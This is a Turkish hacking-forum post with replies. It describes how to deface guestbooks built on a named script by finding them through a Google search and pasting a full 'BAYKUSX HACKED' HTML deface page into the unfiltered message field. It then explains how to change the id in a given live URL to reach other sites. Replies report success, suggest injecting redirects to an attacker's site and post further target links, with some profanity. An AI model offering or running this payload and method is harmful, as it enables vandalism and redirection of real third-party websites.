Baykusx Html Açıgı İle Ziyaretçi Defteri Çökert
-
Arkadaşlar şimdi kullancağımız yöntem alıntı değildir kendim farkettim bayağı işe yarıyor.
mantık şu bazı sistemler html açıgı olan web siteleri kullanıyor.şimdi
googleyi açıyoruz
webkoleji.net/zdefteri diye bir taratma yapıyoruz sonra önümüze çıkan sitelerden birinin ziyaretçi defterine giriyoruz mesaj yaz diyoruz ve çıkan yerdeki bilgileri dolduruyoruz mesaj konusu bölümüne gelince oraya
index kodlarımızı yapıştırıyoruz.index kodlarım yok diyorsanız ben sizin için bir tane hazırladım bykusx yazan yerleri kendinize göre düzenleyin ve kutuya yapıştırın.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<meta name="generator" content="Web Page Maker V2">
<title>BYKUSX-2008 HACKED baykusx@w.cn</title><style type="text/css">
/*----------Text Styles----------*/
.ws6 {font-size: 8px;}
.ws7 {font-size: 9.3px;}
.ws8 {font-size: 11px;}
.ws9 {font-size: 12px;}
.ws10 {font-size: 13px;}
.ws11 {font-size: 15px;}
.ws12 {font-size: 16px;}
.ws14 {font-size: 19px;}
.ws16 {font-size: 21px;}
.ws18 {font-size: 24px;}
.ws20 {font-size: 27px;}
.ws22 {font-size: 29px;}
.ws24 {font-size: 32px;}
.ws26 {font-size: 35px;}
.ws28 {font-size: 37px;}
.ws36 {font-size: 48px;}
.ws48 {font-size: 64px;}
.ws72 {font-size: 96px;}
.wpmd {font-size: 13px;font-family: 'Arial';font-style: normal;font-weight: normal;}
/*----------Para Styles----------*/
DIV,UL,OL /* Left */
{
margin-top: 0px;
margin-bottom: 0px;
}
</style></head>
<body>
<div id="shape1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1133px; height:3019px; z-index:0; background-color:#000000"> </div>
<div id="text1" style="position:absolute; overflow:hidden; left:342px; top:90px; width:515px; height:116px; z-index:1"><div class="wpmd">
<div><font class="ws72" color="#09FF09"><B>HACKED </B></font></div>
</div></div><div id="text2" style="position:absolute; overflow:hidden; left:415px; top:421px; width:220px; height:21px; z-index:2"><div class="wpmd">
<div><font class="ws8" color="#FFFFFF">BAYKUSX-2008 HACKED </font><font class="ws8"><a href="mailto:baykusx@w.cn">baykusx@w.cn</a></font></div>
</div></div><div id="text3" style="position:absolute; overflow:hidden; left:300px; top:243px; width:515px; height:116px; z-index:3"><div class="wpmd">
<div><font class="ws72" color="#09FF09"><B>BAYKUSX</B></font></div>
<div><font class="ws72" color="#09FF09"><B><BR></B></font></div>
</div></div></body>
</html>şimdi arkadaslar eğer girdiğiniz ziyaretçi defteri hacklenmiş ise yapıcagınız tek sey sitenin urlsindeki son dört rakamı değiştirin ve başka sistemlere girin.
http://webkoleji.net/zdefteri/goster.asp?id=6136 (örnektir) yandaki sondaki dört rakamı kullanrak farklı sistemlere ulaşabilrsiniz.
HİÇBİR ŞEYE GEREK YOK SADECE EMEĞE SAYGI.
baykusx@w.cn
-
Emegine saĞlık kardesim tsk ederim denedim olDu
-
gayet kusell calısıo fakat mantık nedir onu anlamadım ??
-
defter scripti mesajları süzgeçten geçirmeden yayınladığı için bu durum oluşuyor :D
-
emeğe saygı :)
-
Muridler bu dökümanı okuyup ta hacklediğiniz siteleri yazınız.
-
Ben böyle ziyaretçi defteri yazan adamın ta amına koyim bu ne la :D
-
zuahhha hayret hiç zannetmiodum çalişcağını ama böle olunca da lamerler türüyo sonra amk:|
-
Hoca mantık şu kadar basit..
Adam ziyaretçi defterine yaz bölümüne html kodunu eklemiş.. tabi dandik ziyaretçi defteri ereg ile süzgeçlemeden
cumburlop almış kodları sql kaydedip orada gösterttirmiş..
-
oraya html için yönlkendirme kodu koy senin sitene yönlensin
çok ta büyük bişey değil bu
çoğu yerde çalışıyor
önemli olan herhangibir sitede çalışıp çalışmadığını kolaylıkla bulabilmekte
yoksa "googleye şu kodu yazın çıkan sonuca şunu yapın" demek gereksizdir.Bunları uygulayanlarda lamerdirbir de diğer sitelere lamer sitesi dersiniz
-
http://webkoleji.net/zdefteri/goster.asp?id=3536
ehehhe ne güzel işmiş bu yaaa.